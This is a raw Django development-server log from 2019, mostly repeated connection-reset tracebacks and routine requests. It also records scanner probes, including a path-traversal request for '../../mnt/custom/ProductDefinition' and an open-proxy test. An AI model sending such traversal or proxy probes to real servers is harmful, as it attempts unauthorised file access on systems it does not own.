Not Found: /cm/
[21/Aug/2019 13:56:12] "GET /cm/ HTTP/1.1" 404 2255
[21/Aug/2019 13:58:19] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 13:58:19] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('104.238.217.123', 2633)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http://www.jiujue.shop/
[21/Aug/2019 13:58:19] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 404 2316
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 13:58:19] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('104.238.217.123', 2784)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('61.219.11.153', 62384)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 14:55:39] "POST /wechat?signature=5c561edb4e0dcbdcc36a59a79d2449bd2c720b3f&timestamp=1566399339&nonce=1633177697&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 227
[21/Aug/2019 15:19:22] "GET / HTTP/1.1" 200 84
[21/Aug/2019 15:37:28] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 15:37:28] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('47.101.159.166', 54620)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 15:37:29] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 15:37:29] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('47.101.159.166', 54622)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 15:47:11] "GET / HTTP/1.1" 200 84
----------------------------------------
Exception happened during processing of request from ('172.104.242.173', 55921)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 17:10:45] "GET / HTTP/1.1" 200 84
[21/Aug/2019 18:18:53] "GET / HTTP/1.1" 200 84
[21/Aug/2019 19:18:30] "GET / HTTP/1.1" 200 84
Not Found: /robots.txt
[21/Aug/2019 19:52:53] "GET /robots.txt HTTP/1.1" 404 2277
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 19:52:53] "GET /robots.txt HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('104.192.74.31', 46742)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 19:52:53] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 19:52:53] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('104.192.74.31', 46800)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 19:52:54] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 19:52:54] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('104.192.74.31', 46860)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 20:06:44] code 400, message Bad request version ('HTTP')
[21/Aug/2019 20:06:44] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
[21/Aug/2019 20:34:51] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 20:34:51] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('61.139.126.52', 51818)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

